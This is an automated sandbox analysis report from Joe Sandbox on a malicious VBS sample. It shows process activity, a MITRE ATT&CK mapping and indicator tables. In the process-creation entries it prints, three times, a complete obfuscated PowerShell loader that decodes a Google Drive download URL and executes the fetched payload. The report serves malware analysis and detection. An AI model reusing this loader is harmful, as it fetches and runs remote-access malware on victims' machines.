gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"			Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#bldningsforstyrrelser bushwhacked rkebiskoppers johnsen inkompetencers urubu brandsikkerheden #>;$ottetals='bluett';<#samkvemsrets polydactylous skemaden vkstcentret forsorgslederens #>;$erstatningspligts40=$host.privatedata;if ($erstatningspligts40) {$skallesmkkernes++;}function virksomhedskategoris($molossian){$arbejdsdatabasen=$knsttelserne+$molossian.length-$skallesmkkernes;for( $nedsivningsbekendtgrelsers=4;$nedsivningsbekendtgrelsers -lt $arbejdsdatabasen;$nedsivningsbekendtgrelsers+=5){$shaftment='refrygtigere';$udlaanssal+=$molossian[$nedsivningsbekendtgrelsers];}$udlaanssal;}function crustaceology($afdelingsingenirers){ & ($ileitis) ($afdelingsingenirers);}$aarstalslisters=virksomhedskategoris 'rea.mredaorsonzvariiuddrleddelbedaatrip/ des5abso. pi.0 pie knu(bl,ew nciifoalnsterdd meot.mtw,ispsal a subin.andtgald fatu1tud 0 inu. tr 0 ser;data unnowsubsiharvnotos6doug4folk;roko s,rexf,er6st.l4mani;pri senrdermvbeha:skav1nuns2libe1trib.co a0fo k) s.i sejgi trebillcaudakfr.iotyra/ku s2misk0ops 1ebra0 ka 0vari1bar,0biot1taxa ls nfwooli rbernor e gulfudnyorefexbuti/u,ny1 eft2malc1 de .pant0besr ';$hjlpemenuen=virksomhedskategoris 'vibrusignsch tepriern pt-f ypafngsga,ceeradinsamftskre ';$stolet111=virksomhedskategoris 'la,ehpremtschit afkpsteds sod: ran/ulid/sv edd.sarp.ecibrudvsupeemiso. scagtreeospiroa,sugbe klthorefr.g. daac staopaulmravn/ vanuprioc.pal? afpetegnxdodep stiomyrirgu rtruna=nos d ,taopoppwmed ne enljerno andap podsush&crimimaandpaga=comp1gamm0spekm hoswag dp esa thr5vill8 r ntg,grh ondf supdprio2miljbv ndo amguhustrozonbspec_ ce wfolkmafskx ejlovervbenzc old-.leflafsvj jinj,oppwga.oroutp4ulemrpiaz ';$skovvogns134=virksomhedskategoris 'e.ke>razo ';$ileitis=virksomhedskategoris 'prosiabsceout,x d s ';$historicoreligious='maffia';$ornerily='\nonpunctuating.sem';crustaceology (virksomhedskategoris 'unde$ ti gsnkelomsto parboli a tillawig:.ransgry,a halnknapd brue erts l d= und$tegnetropntro,vg,ld:kunsaast pafmepsmaldexscahomotristamicr+trom$normo natrkontnproaearberregei sullnonaykons ');crustaceology (virksomhedskategoris ' i,t$sinugsamalskolo befb unsa misl int: ykvsor gnudv.usnadd gnoebillstri khemoamormf s,etpennekrent norso.os= ott$di.iscr,wtpalsogrunlincoea,tetu de1bilb1 ra1trif.sirss rappapprl proir kot nu (mole$chins trekstraoho evaghovyngsoovergp.ernaccrs dia1igno3r gr4flum) ear ');crustaceology (virksomhedskategoris ' con[ tc nradies,avtarbi.palasudsmeu rira kuvarsei antckomme abopnoneo triteran caltjackmsnu a ,kan .oragen.g syenongr bli] irt:ove :befes ma.e figcpolyu dy rhypeispi.tfl wydeklpisoargrdeo pentciteominic frio inklstro unra= tyn hydr[bradn be eclust ana.do.ascephe redcbesvuter rromaisig t entyskumpdis r entoprestudbuohelicretvom.ndld,untkondyt rep outeska ]date:sync:krettmasslpo ys g.a1appe2flyg ');$stolet111=$snudeskaftets[0];$gennemboring=(virksomhedskategoris ' div$ mllgfarfl
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "<#bldningsforstyrrelser bushwhacked rkebiskoppers johnsen inkompetencers urubu brandsikkerheden #>;$ottetals='bluett';<#samkvemsrets polydactylous skemaden vkstcentret forsorgslederens #>;$erstatningspligts40=$host.privatedata;if ($erstatningspligts40) {$skallesmkkernes++;}function virksomhedskategoris($molossian){$arbejdsdatabasen=$knsttelserne+$molossian.length-$skallesmkkernes;for( $nedsivningsbekendtgrelsers=4;$nedsivningsbekendtgrelsers -lt $arbejdsdatabasen;$nedsivningsbekendtgrelsers+=5){$shaftment='refrygtigere';$udlaanssal+=$molossian[$nedsivningsbekendtgrelsers];}$udlaanssal;}function crustaceology($afdelingsingenirers){ & ($ileitis) ($afdelingsingenirers);}$aarstalslisters=virksomhedskategoris 'rea.mredaorsonzvariiuddrleddelbedaatrip/ des5abso. pi.0 pie knu(bl,ew nciifoalnsterdd meot.mtw,ispsal a subin.andtgald fatu1tud 0 inu. tr 0 ser;data unnowsubsiharvnotos6doug4folk;roko s,rexf,er6st.l4mani;pri senrdermvbeha:skav1nuns2libe1trib.co a0fo k) s.i sejgi trebillcaudakfr.iotyra/ku s2misk0ops 1ebra0 ka 0vari1bar,0biot1taxa ls nfwooli rbernor e gulfudnyorefexbuti/u,ny1 eft2malc1 de .pant0besr ';$hjlpemenuen=virksomhedskategoris 'vibrusignsch tepriern pt-f ypafngsga,ceeradinsamftskre ';$stolet111=virksomhedskategoris 'la,ehpremtschit afkpsteds sod: ran/ulid/sv edd.sarp.ecibrudvsupeemiso. scagtreeospiroa,sugbe klthorefr.g. daac staopaulmravn/ vanuprioc.pal? afpetegnxdodep stiomyrirgu rtruna=nos d ,taopoppwmed ne enljerno andap podsush&crimimaandpaga=comp1gamm0spekm hoswag dp esa thr5vill8 r ntg,grh ondf supdprio2miljbv ndo amguhustrozonbspec_ ce wfolkmafskx ejlovervbenzc old-.leflafsvj jinj,oppwga.oroutp4ulemrpiaz ';$skovvogns134=virksomhedskategoris 'e.ke>razo ';$ileitis=virksomhedskategoris 'prosiabsceout,x d s ';$historicoreligious='maffia';$ornerily='\nonpunctuating.sem';crustaceology (virksomhedskategoris 'unde$ ti gsnkelomsto parboli a tillawig:.ransgry,a halnknapd brue erts l d= und$tegnetropntro,vg,ld:kunsaast pafmepsmaldexscahomotristamicr+trom$normo natrkontnproaearberregei sullnonaykons ');crustaceology (virksomhedskategoris ' i,t$sinugsamalskolo befb unsa misl int: ykvsor gnudv.usnadd gnoebillstri khemoamormf s,etpennekrent norso.os= ott$di.iscr,wtpalsogrunlincoea,tetu de1bilb1 ra1trif.sirss rappapprl proir kot nu (mole$chins trekstraoho evaghovyngsoovergp.ernaccrs dia1igno3r gr4flum) ear ');crustaceology (virksomhedskategoris ' con[ tc nradies,avtarbi.palasudsmeu rira kuvarsei antckomme abopnoneo triteran caltjackmsnu a ,kan .oragen.g syenongr bli] irt:ove :befes ma.e figcpolyu dy rhypeispi.tfl wydeklpisoargrdeo pentciteominic frio inklstro unra= tyn hydr[bradn be eclust ana.do.ascephe redcbesvuter rromaisig t entyskumpdis r entoprestudbuohelicretvom.ndld,untkondyt rep outeska ]date:sync:krettmasslpo ys g.a1appe2flyg ');$stolet111=$snudeskaftets[0];$gennemboring=(virksomhedskategoris ' div$ mllgfarfl
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "<#bldningsforstyrrelser bushwhacked rkebiskoppers johnsen inkompetencers urubu brandsikkerheden #>;$ottetals='bluett';<#samkvemsrets polydactylous skemaden vkstcentret forsorgslederens #>;$erstatningspligts40=$host.privatedata;if ($erstatningspligts40) {$skallesmkkernes++;}function virksomhedskategoris($molossian){$arbejdsdatabasen=$knsttelserne+$molossian.length-$skallesmkkernes;for( $nedsivningsbekendtgrelsers=4;$nedsivningsbekendtgrelsers -lt $arbejdsdatabasen;$nedsivningsbekendtgrelsers+=5){$shaftment='refrygtigere';$udlaanssal+=$molossian[$nedsivningsbekendtgrelsers];}$udlaanssal;}function crustaceology($afdelingsingenirers){ & ($ileitis) ($afdelingsingenirers);}$aarstalslisters=virksomhedskategoris 'rea.mredaorsonzvariiuddrleddelbedaatrip/ des5abso. pi.0 pie knu(bl,ew nciifoalnsterdd meot.mtw,ispsal a subin.andtgald fatu1tud 0 inu. tr 0 ser;data unnowsubsiharvnotos6doug4folk;roko s,rexf,er6st.l4mani;pri senrdermvbeha:skav1nuns2libe1trib.co a0fo k) s.i sejgi trebillcaudakfr.iotyra/ku s2misk0ops 1ebra0 ka 0vari1bar,0biot1taxa ls nfwooli rbernor e gulfudnyorefexbuti/u,ny1 eft2malc1 de .pant0besr ';$hjlpemenuen=virksomhedskategoris 'vibrusignsch tepriern pt-f ypafngsga,ceeradinsamftskre ';$stolet111=virksomhedskategoris 'la,ehpremtschit afkpsteds sod: ran/ulid/sv edd.sarp.ecibrudvsupeemiso. scagtreeospiroa,sugbe klthorefr.g. daac staopaulmravn/ vanuprioc.pal? afpetegnxdodep stiomyrirgu rtruna=nos d ,taopoppwmed ne enljerno andap podsush&crimimaandpaga=comp1gamm0spekm hoswag dp esa thr5vill8 r ntg,grh ondf supdprio2miljbv ndo amguhustrozonbspec_ ce wfolkmafskx ejlovervbenzc old-.leflafsvj jinj,oppwga.oroutp4ulemrpiaz ';$skovvogns134=virksomhedskategoris 'e.ke>razo ';$ileitis=virksomhedskategoris 'prosiabsceout,x d s ';$historicoreligious='maffia';$ornerily='\nonpunctuating.sem';crustaceology (virksomhedskategoris 'unde$ ti gsnkelomsto parboli a tillawig:.ransgry,a halnknapd brue erts l d= und$tegnetropntro,vg,ld:kunsaast pafmepsmaldexscahomotristamicr+trom$normo natrkontnproaearberregei sullnonaykons ');crustaceology (virksomhedskategoris ' i,t$sinugsamalskolo befb unsa misl int: ykvsor gnudv.usnadd gnoebillstri khemoamormf s,etpennekrent norso.os= ott$di.iscr,wtpalsogrunlincoea,tetu de1bilb1 ra1trif.sirss rappapprl proir kot nu (mole$chins trekstraoho evaghovyngsoovergp.ernaccrs dia1igno3r gr4flum) ear ');crustaceology (virksomhedskategoris ' con[ tc nradies,avtarbi.palasudsmeu rira kuvarsei antckomme abopnoneo triteran caltjackmsnu a ,kan .oragen.g syenongr bli] irt:ove :befes ma.e figcpolyu dy rhypeispi.tfl wydeklpisoargrdeo pentciteominic frio inklstro unra= tyn hydr[bradn be eclust ana.do.ascephe redcbesvuter rromaisig t entyskumpdis r entoprestudbuohelicretvom.ndld,untkondyt rep outeska ]date:sync:krettmasslpo ys g.a1appe2flyg ');$stolet111=$snudeskaftets[0];$gennemboring=(virksomhedskategoris ' div$ mllgfarfl	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	221 Scripting	Valid Accounts	1 Windows Management Instrumentation	221 Scripting	311 Process Injection	1 Masquerading	OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	31 Virtualization/Sandbox Evasion	LSASS Memory	1 Process Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Exploitation for Client Execution	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	13 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
r20240913TRANSFERENCIA.vbs	3%	ReversingLabs

Source	Detection	Scanner	Label
http://nuget.org/NuGet.exe	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
https://go.micro	0%	URL Reputation	safe
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://aka.ms/pscore6lB	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
https://aka.ms/pscore68	0%	URL Reputation	safe
https://apis.google.com	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	216.58.206.78	true	false		unknown
drive.usercontent.google.com	142.250.184.193	true	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nuget.org/NuGet.exe	powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://drive.usercontent.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05F3BA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.m80;s$	powershell.exe, 00000002.00000002.2271865944.000002E075C22000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://go.m80;	powershell.exe, 00000002.00000002.2271865944.000002E075C22000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://go.micro	powershell.exe, 00000002.00000002.2229676697.000002E05E499000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/License	powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.googP	powershell.exe, 00000002.00000002.2229676697.000002E05F37D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.googh	powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com/	msiexec.exe, 00000007.00000002.2851401747.00000000059B6000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2569079355.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://drive.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://github.com/Pester/Pester	powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://www.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://crl.micro	powershell.exe, 00000005.00000002.2463994877.0000000006DE6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore6lB	powershell.exe, 00000005.00000002.2430583673.0000000004341000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/	powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000002.00000002.2263730437.000002E06D66F000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/o	msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://drive.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05D826000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F2D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DAFE000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://drive.usercontent.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05F760000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05DA98000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp	false		unknown
https://aka.ms/pscore68	powershell.exe, 00000002.00000002.2229676697.000002E05D601000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://apis.google.com	powershell.exe, 00000002.00000002.2229676697.000002E05DA94000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2229676697.000002E05F3A7000.00000004.00000800.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2529517789.00000000059C0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000007.00000003.2527521290.00000000059C0000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://drive.google.com/g	msiexec.exe, 00000007.00000002.2851401747.000000000594A000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000002.00000002.2229676697.000002E05D601000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2430583673.0000000004341000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://crl.v	powershell.exe, 00000002.00000002.2268835169.000002E075951000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.184.193	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
216.58.206.78	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1523428
Start date and time:	2024-10-01 15:51:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	r20240913TRANSFERENCIA.vbs
Detection:	MAL
Classification:	mal100.troj.expl.evad.winVBS@9/11@2/2
EGA Information:	Failed
HCA Information:	Successful, ratio: 77% Number of executed functions: 64 Number of non-executed functions: 11
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.22
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 1900 because it is empty
Execution Graph export aborted for target powershell.exe, PID 6592 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
VT rate limit hit for: r20240913TRANSFERENCIA.vbs

Simulations

Behavior and APIs

Time	Type	Description
09:51:59	API Interceptor	114x Sleep call for process: powershell.exe modified
09:53:19	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	asegurar.vbs	Get hash	malicious	Remcos	Browse	216.58.206.78 142.250.184.193
	dcsegura.vbs	Get hash	malicious	AsyncRAT, DcRat	Browse	216.58.206.78 142.250.184.193
	asegura.vbs	Get hash	malicious	Remcos	Browse	216.58.206.78 142.250.184.193
	grace.exe	Get hash	malicious	AgentTesla	Browse	216.58.206.78 142.250.184.193
	file.exe	Get hash	malicious	Credential Flusher	Browse	216.58.206.78 142.250.184.193
	hesaphareketi-01.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	216.58.206.78 142.250.184.193
	https://swissquotech.com/swissquote-2024.zip	Get hash	malicious	Phisher	Browse	216.58.206.78 142.250.184.193
	He6pI1bhcA.exe	Get hash	malicious	ScreenConnect Tool	Browse	216.58.206.78 142.250.184.193
